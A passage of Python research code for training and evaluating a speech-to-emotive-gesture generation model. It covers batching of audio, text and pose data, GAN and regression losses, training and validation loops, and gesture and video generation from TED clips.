mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2eg.n_poses]
pose_seq = pose_seq[0:data_s2eg.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2eg.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2eg.n_poses, data_s2eg.lang_model,
data_s2eg.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
mfcc_features = torch.from_numpy(mfcc_features).float()
audio = torch.from_numpy(audio).float()
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_audio[i] = audio
batch_mfcc[i] = mfcc_features
# speaker input
if train:
if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
else:
if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
# with data_s2eg.lmdb_env.begin(write=False) as txn:
# threads = []
# for i, k in enumerate(rand_keys):
# threads.append(threading.Thread(target=load_from_txn, args=[i, k]))
# threads[i].start()
# for i in range(len(rand_keys)):
# threads[i].join()
yield batch_word_seq_tensor, batch_word_seq_lengths, batch_extended_word_seq, batch_pose_seq, \
batch_vec_seq, batch_audio, batch_spectrogram, batch_mfcc, batch_vid_indices
def yield_batch(self, train):
if train:
data_s2eg = self.data_loader['train_data_s2eg']
num_data = self.num_train_samples
else:
data_s2eg = self.data_loader['val_data_s2eg']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
if train:
batch_extended_word_seq = torch.from_numpy(
self.train_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.train_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.train_samples['audio'][rand_keys] *
self.train_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.train_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.train_samples['vid_indices'][rand_keys]
else:
batch_extended_word_seq = torch.from_numpy(
self.val_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.val_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.val_samples['audio'][rand_keys] *
self.val_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.val_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.val_samples['vid_indices'][rand_keys]
# speaker input
batch_vid_indices = None
if train and self.train_speaker_model and\
self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.train_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
elif self.val_speaker_model and\
self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.val_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
yield batch_extended_word_seq, batch_vec_seq, batch_audio, batch_mfcc_features, batch_vid_indices
def return_batch(self, batch_size, randomized=True):
data_s2eg = self.data_loader['test_data_s2eg']
if len(batch_size) > 1:
rand_keys = np.copy(batch_size)
batch_size = len(batch_size)
else:
batch_size = batch_size[0]
prob_dist = np.ones(self.num_test_samples) / float(self.num_test_samples)
if randomized:
rand_keys = np.random.choice(self.num_test_samples, size=batch_size, replace=False, p=prob_dist)
else:
rand_keys = np.arange(batch_size)
batch_words = [[] for _ in range(batch_size)]
batch_aux_info = [[] for _ in range(batch_size)]
batch_word_seq_tensor = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_target_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
for i, k in enumerate(rand_keys):
with data_s2eg.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# for selected_vi in range(len(word_seq)): # make start time of input text zero
# word_seq[selected_vi][1] -= aux_info['start_time'] # start time
# word_seq[selected_vi][2] -= aux_info['start_time'] # end time
batch_words[i] = [word_seq[i][0] for i in range(len(word_seq))]
batch_aux_info[i] = aux_info
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2eg.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
spectrogram = spectrogram[:, 0:self.spectrogram_length]
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2eg.n_poses]
pose_seq = pose_seq[0:data_s2eg.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2eg.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2eg.n_poses, data_s2eg.lang_model,
data_s2eg.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
target_seq = convert_pose_seq_to_dir_vec(pose_seq)
target_seq = target_seq.reshape(target_seq.shape[0], -1)
target_seq -= np.reshape(self.s2eg_config_args.mean_dir_vec, -1)
mfcc_features = torch.from_numpy(mfcc_features)
audio = torch.from_numpy(audio).float()
spectrogram = torch.from_numpy(spectrogram)
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_target_seq[i] = torch.from_numpy(target_seq).float()
batch_audio[i] = audio
batch_spectrogram[i] = spectrogram
batch_mfcc[i] = mfcc_features
# speaker input
# if self.test_speaker_model and self.test_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[i] = \
# torch.LongTensor([self.test_speaker_model.word2index[aux_info['vid']]])
batch_vid_indices = torch.LongTensor(
[np.random.choice(list(self.test_speaker_model.word2index.values()))
for _ in range(batch_size)]).to(self.device)
return batch_words, batch_aux_info, batch_word_seq_tensor, batch_word_seq_lengths, \
batch_extended_word_seq, batch_pose_seq, batch_vec_seq, batch_target_seq, batch_audio, \
batch_spectrogram, batch_mfcc, batch_vid_indices
@staticmethod
def add_noise(data):
noise = torch.randn_like(data) * 0.1
return data + noise
@staticmethod
def push_samples(evaluator, target, out_dir_vec, in_text_padded, in_audio,
losses_all, joint_mae, accel, mean_dir_vec, n_poses, n_pre_poses):
batch_size = len(target)
# if evaluator:
# evaluator.reset()
loss = F.l1_loss(out_dir_vec, target)
losses_all.update(loss.item(), batch_size)
if evaluator:
evaluator.push_samples(in_text_padded, in_audio, out_dir_vec, target)
# calculate MAE of joint coordinates
out_dir_vec_np = out_dir_vec.detach().cpu().numpy()
out_dir_vec_np += np.array(mean_dir_vec).squeeze()
out_joint_poses = convert_dir_vec_to_pose(out_dir_vec_np)
target_vec = target.detach().cpu().numpy()
target_vec += np.array(mean_dir_vec).squeeze()
target_poses = convert_dir_vec_to_pose(target_vec)
if out_joint_poses.shape[1] == n_poses:
diff = out_joint_poses[:, n_pre_poses:] - \
target_poses[:, n_pre_poses:]
else:
diff = out_joint_poses - target_poses[:, n_pre_poses:]
mae_val = np.mean(np.absolute(diff))
joint_mae.update(mae_val, batch_size)
# accel
target_acc = np.diff(target_poses, n=2, axis=1)
out_acc = np.diff(out_joint_poses, n=2, axis=1)
accel.update(np.mean(np.abs(target_acc - out_acc)), batch_size)
return evaluator, losses_all, joint_mae, accel
def forward_pass_s2eg(self, in_text, in_audio, in_mfcc, target_poses, vid_indices, train,
target_seq=None, words=None, aux_info=None, save_path=None, make_video=False,
calculate_metrics=False, losses_all_trimodal=None, joint_mae_trimodal=None,
accel_trimodal=None, losses_all=None, joint_mae=None, accel=None):
warm_up_epochs = self.s2eg_config_args.loss_warmup
use_noisy_target = False
# make pre seq input
pre_seq = target_poses.new_zeros((target_poses.shape[0], target_poses.shape[1],
target_poses.shape[2] + 1))
pre_seq[:, 0:self.s2eg_config_args.n_pre_poses, :-1] =\
target_poses[:, 0:self.s2eg_config_args.n_pre_poses]
pre_seq[:, 0:self.s2eg_config_args.n_pre_poses, -1] = 1 # indicating bit for constraints
###########################################################################################
# train D
dis_error = None
if self.meta_info['epoch'] > warm_up_epochs and self.s2eg_config_args.loss_gan_weight > 0.0:
self.s2eg_dis_optimizer.zero_grad()
# out shape (batch x seq x dim)
if self.use_mfcc:
out_dir_vec, *_ = self.s2eg_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, *_ = self.s2eg_generator(pre_seq, in_text, in_audio, vid_indices)
if use_noisy_target:
noise_target = Processor.add_noise(target_poses)
noise_out = Processor.add_noise(out_dir_vec.detach())
dis_real = self.s2eg_discriminator(noise_target, in_text)
dis_fake = self.s2eg_discriminator(noise_out, in_text)
else:
dis_real = self.s2eg_discriminator(target_poses, in_text)
dis_fake = self.s2eg_discriminator(out_dir_vec.detach(), in_text)
dis_error = torch.sum(-torch.mean(torch.log(dis_real + 1e-8) + torch.log(1 - dis_fake + 1e-8))) # ns-gan
if train:
dis_error.backward()
self.s2eg_dis_optimizer.step()
###########################################################################################
# train G
self.s2eg_gen_optimizer.zero_grad()
# decoding
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq, in_text, in_audio, vid_indices)
if self.use_mfcc:
out_dir_vec, z, z_mu, z_log_var = self.s2eg_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, z, z_mu, z_log_var = self.s2eg_generator(pre_seq, in_text, in_audio, vid_indices)
# make a video
assert not make_video or (make_video and target_seq is not None), \
'target_seq cannot be None when make_video is True'
assert not make_video or (make_video and words is not None), \
'words cannot be None when make_video is True'
assert not make_video or (make_video and aux_info is not None), \
'aux_info cannot be None when make_video is True'
assert not make_video or (make_video and save_path is not None), \
'save_path cannot be None when make_video is True'
if make_video:
sentence_words = []
for word in words:
sentence_words.append(word)
sentences = [' '.join(sentence_word) for sentence_word in sentence_words]
num_videos = len(aux_info)
for vid_idx in range(num_videos):
start_time = time.time()
filename_prefix = '{}_{}'.format(aux_info[vid_idx]['vid'], vid_idx)
filename_prefix_for_video = filename_prefix
aux_str = '({}, time: {}-{})'.format(aux_info[vid_idx]['vid'],
str(datetime.timedelta(
seconds=aux_info[vid_idx]['start_time'])),
str(datetime.timedelta(
seconds=aux_info[vid_idx]['end_time'])))
create_video_and_save(
save_path, 0, filename_prefix_for_video, 0,
target_seq[vid_idx].cpu().numpy(),
out_dir_vec_trimodal[vid_idx].cpu().numpy(), out_dir_vec[vid_idx].cpu().numpy(),
np.reshape(self.s2eg_config_args.mean_dir_vec, -1), sentences[vid_idx],
audio=in_audio[vid_idx].cpu().numpy(), aux_str=aux_str,
clipping_to_shortest_stream=True, delete_audio_file=False)
print('\rRendered {} of {} videos. Last one took {:.2f} seconds.'.format(vid_idx + 1,
num_videos,
time.time() - start_time),
end='')
print()
# calculate metrics
assert not calculate_metrics or (calculate_metrics and target_seq is not None), \
'target_seq cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and losses_all_trimodal is not None), \
'losses_all_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and joint_mae_trimodal is not None), \
'joint_mae_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and accel_trimodal is not None), \
'accel_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and losses_all is not None), \
'losses_all cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and joint_mae is not None), \
'joint_mae cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and accel is not None), \
'accel cannot be None when calculate_metrics is True'
if calculate_metrics:
self.evaluator_trimodal, losses_all_trimodal, joint_mae_trimodal, accel_trimodal =\
Processor.push_samples(self.evaluator_trimodal, target_seq, out_dir_vec_trimodal,
in_text, in_audio, losses_all_trimodal, joint_mae_trimodal, accel_trimodal,
self.s2eg_config_args.mean_dir_vec, self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
self.evaluator, losses_all, joint_mae, accel =\
Processor.push_samples(self.evaluator, target_seq, out_dir_vec,
in_text, in_audio, losses_all, joint_mae, accel,
self.s2eg_config_args.mean_dir_vec, self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
# loss
beta = 0.1
huber_loss = F.smooth_l1_loss(out_dir_vec / beta, target_poses / beta) * beta
dis_output = self.s2eg_discriminator(out_dir_vec, in_text)
gen_error = -torch.mean(torch.log(dis_output + 1e-8))
kld = div_reg = None
if (self.s2eg_config_args.z_type == 'speaker' or self.s2eg_config_args.z_type == 'random') and \
self.s2eg_config_args.loss_reg_weight > 0.0:
if self.s2eg_config_args.z_type == 'speaker':
# enforcing divergent gestures btw original vid and other vid
rand_idx = torch.randperm(vid_indices.shape[0])
rand_vids = vid_indices[rand_idx]
else:
rand_vids = None
if self.use_mfcc:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2eg_generator(pre_seq, in_text, in_mfcc, rand_vids)
else:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2eg_generator(pre_seq, in_text, in_audio, rand_vids)
beta = 0.05
pose_l1 = F.smooth_l1_loss(out_dir_vec / beta, out_dir_vec_rand_vid.detach() / beta,
reduction='none') * beta
pose_l1 = pose_l1.sum(dim=1).sum(dim=1)
pose_l1 = pose_l1.view(pose_l1.shape[0], -1).mean(1)
z_l1 = F.l1_loss(z.detach(), z_rand_vid.detach(), reduction='none')
z_l1 = z_l1.view(z_l1.shape[0], -1).mean(1)
div_reg = -(pose_l1 / (z_l1 + 1.0e-5))
div_reg = torch.clamp(div_reg, min=-1000)
div_reg = div_reg.mean()
if self.s2eg_config_args.z_type == 'speaker':
# speaker embedding KLD
kld = -0.5 * torch.mean(1 + z_log_var - z_mu.pow(2) - z_log_var.exp())
loss = self.s2eg_config_args.loss_regression_weight * huber_loss + \
self.s2eg_config_args.loss_kld_weight * kld + \
self.s2eg_config_args.loss_reg_weight * div_reg
else:
loss = self.s2eg_config_args.loss_regression_weight * huber_loss + \
self.s2eg_config_args.loss_reg_weight * div_reg
else:
loss = self.s2eg_config_args.loss_regression_weight * huber_loss # + var_loss
if self.meta_info['epoch'] > warm_up_epochs:
loss += self.s2eg_config_args.loss_gan_weight * gen_error
if train:
loss.backward()
self.s2eg_gen_optimizer.step()
loss_dict = {'loss': self.s2eg_config_args.loss_regression_weight * huber_loss.item()}
if kld:
loss_dict['KLD'] = self.s2eg_config_args.loss_kld_weight * kld.item()
if div_reg:
loss_dict['DIV_REG'] = self.s2eg_config_args.loss_reg_weight * div_reg.item()
if self.meta_info['epoch'] > warm_up_epochs and self.s2eg_config_args.loss_gan_weight > 0.0:
loss_dict['gen'] = self.s2eg_config_args.loss_gan_weight * gen_error.item()
loss_dict['dis'] = dis_error.item()
# total_loss = 0.
# for loss in loss_dict.keys():
# total_loss += loss_dict[loss]
# return loss_dict, losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
return F.l1_loss(out_dir_vec, target_poses).item() - F.l1_loss(out_dir_vec_trimodal, target_poses).item(),\
losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
def per_train_epoch(self):
self.s2eg_generator.train()
self.s2eg_discriminator.train()
batch_s2eg_loss = 0.
num_batches = self.num_train_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=True):
loss, *_ = self.forward_pass_s2eg(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=True)
# Compute statistics
batch_s2eg_loss += loss
self.iter_info['s2eg_loss'] = loss
self.iter_info['lr_gen'] = '{}'.format(self.lr_s2eg_gen)
self.iter_info['lr_dis'] = '{}'.format(self.lr_s2eg_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2eg_loss /= num_batches
self.epoch_info['mean_s2eg_loss'] = batch_s2eg_loss
self.show_epoch_info()
self.io.print_timer()
# self.adjust_lr_s2eg()
def per_val_epoch(self):
self.s2eg_generator.eval()
self.s2eg_discriminator.eval()
batch_s2eg_loss = 0.
num_batches = self.num_val_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=False):
with torch.no_grad():
loss, *_ = self.forward_pass_s2eg(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False)
# Compute statistics
batch_s2eg_loss += loss
self.iter_info['s2eg_loss'] = loss
self.iter_info['lr_gen'] = '{:.6f}'.format(self.lr_s2eg_gen)
self.iter_info['lr_dis'] = '{:.6f}'.format(self.lr_s2eg_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2eg_loss /= num_batches
self.epoch_info['mean_s2eg_loss'] = batch_s2eg_loss
if self.epoch_info['mean_s2eg_loss'] < self.best_s2eg_loss and \
self.meta_info['epoch'] > self.min_train_epochs:
self.best_s2eg_loss = self.epoch_info['mean_s2eg_loss']
self.best_s2eg_loss_epoch = self.meta_info['epoch']
self.s2eg_loss_updated = True
else:
self.s2eg_loss_updated = False
self.show_epoch_info()
self.io.print_timer()
def train(self):
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
if self.args.s2eg_load_last_best:
s2eg_model_found = self.load_model_at_epoch(epoch=self.args.s2eg_start_epoch)
if not s2eg_model_found and self.args.s2eg_start_epoch is not 'best':
print('Warning! Trying to load best known model for s2eg: '.format(self.args.s2eg_start_epoch),
end='')
s2eg_model_found = self.load_model_at_epoch(epoch='best')
self.args.s2eg_start_epoch = self.best_s2eg_loss_epoch if s2eg_model_found else 0
print('loaded.')
if not s2eg_model_found:
print('Warning! Starting at epoch 0')
self.args.s2eg_start_epoch = 0
else:
self.args.s2eg_start_epoch = 0
for epoch in range(self.args.s2eg_start_epoch, self.args.s2eg_num_epoch):
self.meta_info['epoch'] = epoch
# training
self.io.print_log('S2EG training epoch: {}'.format(epoch))
self.per_train_epoch()
self.io.print_log('Done.')
# validation
if (epoch % self.args.val_interval == 0) or (
epoch + 1 == self.args.num_epoch):
self.io.print_log('S2EG val epoch: {}'.format(epoch))
self.per_val_epoch()
self.io.print_log('Done.')
# save model and weights
if self.s2eg_loss_updated or (epoch % self.args.save_interval == 0 and epoch > self.min_train_epochs):
torch.save({'gen_model_dict': self.s2eg_generator.state_dict(),
'dis_model_dict': self.s2eg_discriminator.state_dict()},
jn(self.args.work_dir_s2eg, 'epoch_{}_loss_{:.4f}_model.pth.tar'.
format(epoch, self.epoch_info['mean_s2eg_loss'])))
def generate_gestures(self, samples_to_generate=10, randomized=True, load_saved_model=True,
s2eg_epoch='best', make_video=False, calculate_metrics=True):
if load_saved_model:
s2eg_model_found = self.load_model_at_epoch(epoch=s2eg_epoch)
assert s2eg_model_found, print('Speech to emotive gestures model not found')
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2eg_generator.eval()
self.s2eg_discriminator.eval()
batch_size = 2048
losses_all_trimodal = AverageMeter('loss')
joint_mae_trimodal = AverageMeter('mae_on_joint')
accel_trimodal = AverageMeter('accel')
losses_all = AverageMeter('loss')
joint_mae = AverageMeter('mae_on_joint')
accel = AverageMeter('accel')
start_time = time.time()
for sample_idx in np.arange(0, samples_to_generate, batch_size):
samples_curr = np.arange(sample_idx, sample_idx + min(batch_size, samples_to_generate - sample_idx))
words, aux_info, word_seq_tensor, word_seq_lengths, extended_word_seq, \
pose_seq, vec_seq, target_seq, audio, spectrogram, mfcc_features, vid_indices = \
self.return_batch(samples_curr, randomized=randomized)
with torch.no_grad():
loss_dict, losses_all_trimodal, joint_mae_trimodal,\
accel_trimodal, losses_all, joint_mae, accel = \
self.forward_pass_s2eg(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False,
target_seq=target_seq, words=words, aux_info=aux_info,
save_path=self.args.video_save_path,
make_video=make_video, calculate_metrics=calculate_metrics,
losses_all_trimodal=losses_all_trimodal,
joint_mae_trimodal=joint_mae_trimodal, accel_trimodal=accel_trimodal,
losses_all=losses_all, joint_mae=joint_mae, accel=accel)
end_idx = min(samples_to_generate, sample_idx + batch_size)
# print metrics
loss_dict = {'loss_trimodal': losses_all_trimodal.avg, 'joint_mae_trimodal': joint_mae_trimodal.avg,
'loss': losses_all.avg, 'joint_mae': joint_mae.avg}
elapsed_time = time.time() - start_time
if self.evaluator_trimodal and self.evaluator_trimodal.get_no_of_samples() > 0:
frechet_dist_trimodal, feat_dist_trimodal = self.evaluator_trimodal.get_scores()
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg, accel_trimodal.avg,
frechet_dist_trimodal, feat_dist_trimodal,
elapsed_time))
loss_dict['frechet_trimodal'] = frechet_dist_trimodal
loss_dict['feat_dist_trimodal'] = feat_dist_trimodal
else:
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
elapsed_time))
if self.evaluator and self.evaluator.get_no_of_samples() > 0:
frechet_dist, feat_dist = self.evaluator.get_scores()
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all.avg, joint_mae.avg, accel.avg,
frechet_dist, feat_dist, elapsed_time))
loss_dict['frechet'] = frechet_dist
loss_dict['feat_dist'] = feat_dist
else:
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all.avg,
joint_mae.avg,
elapsed_time))
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - start_time))
def generate_gestures_by_dataset(self, dataset, data_params,
randomized=True, fade_out=False,
load_saved_model=True, s2eg_epoch='best',
make_video=False, save_pkl=False):
if load_saved_model:
s2eg_model_found = self.load_model_at_epoch(epoch=s2eg_epoch)
assert s2eg_model_found, print('Speech to emotive gestures model not found')
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2eg_generator.eval()
self.s2eg_discriminator.eval()
mean_dir_vec = np.squeeze(np.array(self.s2eg_config_args.mean_dir_vec))
losses_all_trimodal = AverageMeter('loss')
joint_mae_trimodal = AverageMeter('mae_on_joint')
accel_trimodal = AverageMeter('accel')
losses_all = AverageMeter('loss')
joint_mae = AverageMeter('mae_on_joint')
accel = AverageMeter('accel')
overall_start_time = time.time()
if dataset.lower() == 'ted_db':
if 'clip_duration_range' not in data_params.keys():
data_params['clip_duration_range'] = [5, 12]
lmdb_env = lmdb.open(data_params['env_file'], readonly=True, lock=False)
with lmdb_env.begin(write=False) as txn:
keys = [key for key, _ in txn.cursor()]
samples_to_generate = len(keys)
print('Total samples to generate: {}'.format(samples_to_generate))
for sample_idx in range(samples_to_generate): # loop until we get the desired number of results
start_time = time.time()
# select video
if randomized:
key = np.random.choice(keys)
else:
key = keys[sample_idx]
buf = txn.get(key)
video = pyarrow.deserialize(buf)
vid_name = video['vid']
clips = video['clips']
n_clips = len(clips)
if n_clips == 0:
continue
if randomized:
clip_idx = np.random.randint(0, n_clips)
vid_idx = np.random.randint(0, self.test_speaker_model.n_words)
else:
clip_idx = 0
vid_idx = 0
clip_poses = clips[clip_idx]['skeletons_3d']
clip_audio = clips[clip_idx]['audio_raw']
clip_words = clips[clip_idx]['words']
clip_time = [clips[clip_idx]['start_time'], clips[clip_idx]['end_time']]
clip_poses = resample_pose_seq(clip_poses, clip_time[1] - clip_time[0],
self.s2eg_config_args.motion_resampling_framerate)
target_dir_vec = convert_pose_seq_to_dir_vec(clip_poses)
target_dir_vec = target_dir_vec.reshape(target_dir_vec.shape[0], -1)
target_dir_vec -= mean_dir_vec
n_frames_total = len(target_dir_vec)
# check duration
clip_duration = clip_time[1] - clip_time[0]
if clip_duration < data_params['clip_duration_range'][0] or\
clip_duration > data_params['clip_duration_range'][1]:
continue
# synthesize
for selected_vi in range(len(clip_words)): # make start time of input text zero
clip_words[selected_vi][1] -= clip_time[0] # start time
clip_words[selected_vi][2] -= clip_time[0] # end time
out_list_trimodal = []
out_list = []
n_frames = self.s2eg_config_args.n_poses
clip_length = len(clip_audio) / data_params['audio_sr']
seed_seq = target_dir_vec[0:self.s2eg_config_args.n_pre_poses]
# pre seq
pre_seq_trimodal = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2eg_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
pre_seq = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2eg_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
# target seq
target_seq = torch.from_numpy(target_dir_vec[0:n_frames]).unsqueeze(0).float().to(self.device)
spectrogram = None
# divide into synthesize units and do synthesize
unit_time = self.s2eg_config_args.n_poses / \
self.s2eg_config_args.motion_resampling_framerate
stride_time = (self.s2eg_config_args.n_poses - self.s2eg_config_args.n_pre_poses) / \
self.s2eg_config_args.motion_resampling_framerate
if clip_length < unit_time:
num_subdivisions = 1
else:
num_subdivisions = math.ceil((clip_length - unit_time) / stride_time)
spectrogram_sample_length = int(round(unit_time * data_params['audio_sr'] / 512))
audio_sample_length = int(unit_time * data_params['audio_sr'])
end_padding_duration = 0
# prepare speaker input
if self.s2eg_config_args.z_type == 'speaker':
if vid_idx is None:
vid_idx = np.random.randint(0, self.s2eg_generator.z_obj.n_words)
print('vid idx:', vid_idx)
vid_idx = torch.LongTensor([vid_idx]).to(self.device)
else:
vid_idx = None
print('Sample {} of {}'.format(sample_idx + 1, samples_to_generate))
print('Subdivisions\t|\tUnit Time\t|\tClip Length\t|\tStride Time\t|\tAudio Sample Length')
print('{}\t\t\t\t|\t{:.4f}\t\t|\t{:.4f}\t\t|\t{:.4f}\t\t|\t{}'.
format(num_subdivisions, unit_time, clip_length,
stride_time, audio_sample_length))
out_dir_vec_trimodal = None
out_dir_vec = None
for sub_div_idx in range(0, num_subdivisions):
overall_start_time = sub_div_idx * stride_time
end_time = overall_start_time + unit_time
# prepare spectrogram input
in_spec = None
# prepare audio input
audio_start = math.floor(overall_start_time / clip_length * len(clip_audio))
audio_end = audio_start + audio_sample_length
in_audio_np = clip_audio[audio_start:audio_end]
if len(in_audio_np) < audio_sample_length:
if sub_div_idx == num_subdivisions - 1:
end_padding_duration = audio_sample_length - len(in_audio_np)
in_audio_np = np.pad(in_audio_np, (0, audio_sample_length - len(in_audio_np)),
'constant')
in_mfcc = torch.from_numpy(mfcc(in_audio_np, sr=16000, n_mfcc=self.num_mfcc) / 1000.).\
unsqueeze(0).to(self.device).float()
in_audio = torch.from_numpy(in_audio_np).unsqueeze(0).to(self.device).float()
# prepare text input
word_seq = DataPreprocessor.get_words_in_time_range(word_list=clip_words,
start_time=overall_start_time,
end_time=end_time)
